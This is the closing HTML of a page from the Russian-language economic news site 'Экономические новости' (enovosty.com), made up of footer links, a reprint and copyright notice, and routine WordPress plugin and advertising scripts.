head.appendChild(script);</script></div> end NEW_content_v1 for enovosty.com --><div class="cls"></div><br> <div id="footer"> <div class="wiget text" style="padding-right:0; margin-right:0;" > <div id="bottom-menu" style="background: #F93; height:40px"> <a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/contacts">КОНТАКТЫ</a>|<a style="display: inline-block; width: 220px;vertical-align: top;" href="https://enovosty.com/politika-konfididencijnosti-ta-zaxistu-personalnix-danix">Политика конфиденциальности<br>и защиты персональных данных</a>|<a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/redakcionnaya-politika">Редакционная политика</a>|<a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/newsitemap">Карта сайта</a> </div> <div id="counters" > </div> <div id="textfooter"> <p>2018 &copy; "Экономические новости"</p> <p>Все права защищены. </p><p>Использование материалов разрешается при условии ссылки на <a href="https://enovosty.com" style="color:#336699; text-decoration:underline;">"Экономические новости"</a> (www.enovosty.com). Для интернет-изданий обязательной является прямая гиперссылка, не закрытая от индексации поисковыми системами (отсутствие в ссылке rel="nofollow" или "noindex" ), в первом или втором абзаце опубликованного материала (ссылка должна быть в тексте) на цитируемую статью или новость. Материалы, обозначенные символом <img style="margin-bottom:-3px" src="https://enovosty.com/wp-content/themes/eizvestia/img/reklama.png" width="16" height="14" alt="" />, публикуются на правах рекламы. <br />Производство онлайн-департамента газеты "Экономические новости" (www.enovosty.com).</p> </div> <a href="https://prnews.io/ru/sites/85-enovostycom.html?i=11347" target="_blank" rel="nofollow" style="
float: right;
font-weight: bold;
color: #369;
padding: 10px;
">Размещение пресс-релизов</a> </div> </div> <div class="links_bal"> </div></div><script src="https://enovosty.com/wp-content/themes/eizvestia/js/eishare.js?v=4"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/afk.js"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/mailto.js"></script><div id="error-notification-id" class="enp-4769418"></div><div id="error-notification-settings" style="display: none;"><p>Спасибо большое за Вашу помощь. Мы исправим ошибку в ближайшее время!</p></div> <script>var isProcessing = false;function alter_ul_post_values(obj,post_id,ul_type){if (isProcessing)
return;isProcessing = true;jQuery(obj).find("span").html("..");jQuery.ajax({type: "POST",url: window.location.origin + "/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php",data: "post_id="+post_id+"&up_type="+ul_type,success: function(msg){jQuery(obj).find("span").html(msg);isProcessing = false;}});}</script> <link rel='stylesheet' id='wsl-widget-css' href='https://enovosty.com/wp-content/plugins/wordpress-social-login/assets/css/style.css' type='text/css' media='all' /><script type='text/javascript'>
var enp = {"ajaxurl":"\/wp-admin\/admin-ajax.php","barBackground":"#ff9933","barPosition":"bottom","barTextColor":"#ffffff","baseurl":"https:\/\/enovosty.com","confirmation":"1","cbTitle":"Are you sure?","cbError":"Error","cbOK":"OK","cbCancel":"Cancel"};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/error-notification/error_notifi.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/ajax-comment-loading/js/google-acl2.js'></script><script type='text/javascript'>
var pollsL10n = {"ajax_url":"https:\/\/enovosty.com\/wp-admin\/admin-ajax.php","text_wait":"\u0412\u0430\u0448 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0439 \u0437\u0430\u043f\u0440\u043e\u0441 \u0432\u0441\u0435 \u0435\u0449\u0435 \u043e\u0431\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u0435\u0442\u0441\u044f. \u041f\u043e\u0436\u0430\u043b\u0443\u0439\u0441\u0442\u0430, \u043f\u043e\u0434\u043e\u0436\u0434\u0438\u0442\u0435\u2026","text_valid":"\u041f\u043e\u0436\u0430\u043b\u0443\u0439\u0441\u0442\u0430, \u0432\u044b\u0431\u0435\u0440\u0438\u0442\u0435 \u0434\u043e\u043f\u0443\u0441\u0442\u0438\u043c\u044b\u0439 \u0432\u0430\u0440\u0438\u0430\u043d\u0442 \u043e\u0442\u0432\u0435\u0442\u0430.","text_multiple":"\u041c\u0430\u043a\u0441\u0438\u043c\u0430\u043b\u044c\u043d\u043e\u0435 \u0440\u0430\u0437\u0440\u0435\u0448\u0451\u043d\u043d\u043e\u0435 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u0432\u044b\u0431\u0438\u0440\u0430\u0435\u043c\u044b\u0445 \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u043e\u0432:","show_loading":"1","show_fading":"1"};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/wp-polls/polls.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/clearfy/components/comments-plus/assets/js/url-span.js'></script><script type='text/javascript'>
var socialWarfare = {"addons":[],"post_id":"4769418","floatBeforeContent":""};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/social-warfare/assets/js/script.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/wp-embed.min.js'></script><script type='text/javascript'>
var icl_vars = {"current_language":"ru","icl_home":"https:\/\/enovosty.com\/","ajax_url":"https:\/\/enovosty.com\/wp-admin\/admin-ajax.php","url_type":"1"};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/sitepress-multilingual-cms/res/js/sitepress_js.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/comment-reply.min.js'></script><script type="text/javascript"> var swp_nonce = "92f5c157ff";var swpFloatBeforeContent = false;var swpClickTracking = false;</script><script>//new adriver("adriver_banner_A1", {sid:101080,sz:"A1", bt:52,pz:1,bn:0});
new adriver("adriver_banner_B4", {sid:101080,sz:"B4", bt:52,pz:2,bn:1});new adriver("adriver_banner_C1", {sid: 101080, sz: "C1", pz: 1, bn: 1, bt:52});//new adriver("adriver_banner_C2", {sid: 101080, sz: "C2", pz: 2, bn: 2, bt:52});
new adriver("adriver_banner_C3", {sid: 101080, sz: "C3", pz: 2, bn: 3, bt:52});new adriver("adriver_banner_branding", {sid: 101080, sz: "branding", bt:52});//new adriver("adriver_banner_1964215071", {sid:101080, bt:52, sz:'contentroll'});
</script><script>document.getElementById('logo').style.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(...)";//img.style.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(...)";
</script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/iepngfix.min.js" ></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/png_fix.js" ></script><script>//var pollsL10n = document.getElementById('pollsL10n');
</script><!--<script type="text/javascript">admixerML.fn.push(function () {admixerML.defineSlot({z: '0e893395-4b69-455a-9d7a-6bc8d2aa074f',ph: 'admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069',i: 'inv-nets'
});admixerML.singleRequest();});</script>--><div id='admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069'></div><script>admixerML.fn.push(function () { admixerML.display('admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069'); });</script><!--<script type="text/javascript" charset="utf-8">(function(d,s){var o=d.createElement(s);o.async=true;o.type="text/javascript";o.charset="utf-8";if (location.protocol == "https:")
{ o.src="https://js-ru.redtram.com/n4p/0/30/ticker_30546.js"; }else
{ o.src="https://js.ru.redtram.com/n4p/0/30/ticker_30546.js"; }var x=d.getElementsByTagName(s)[0];x.parentNode.insertBefore(o,x);})(document,"script");</script>
--><script>jQuery(document).ready(function($){setTimeout(function() { ah2 = $("body .container").height(); $("#brandingimg").css('height', ah2 + 'px'); }, 2500);});</script><script src="https://affiliate.ria.com/js/ria_informer.js?riacode=015d2e7c4ce2cda608aa710275088255" async></script><div id="bfooter" style="width:1004px;margin:0 auto;position: relative;padding: 0 10px;display: block;text-align:left;">&nbsp;</div> </body></html>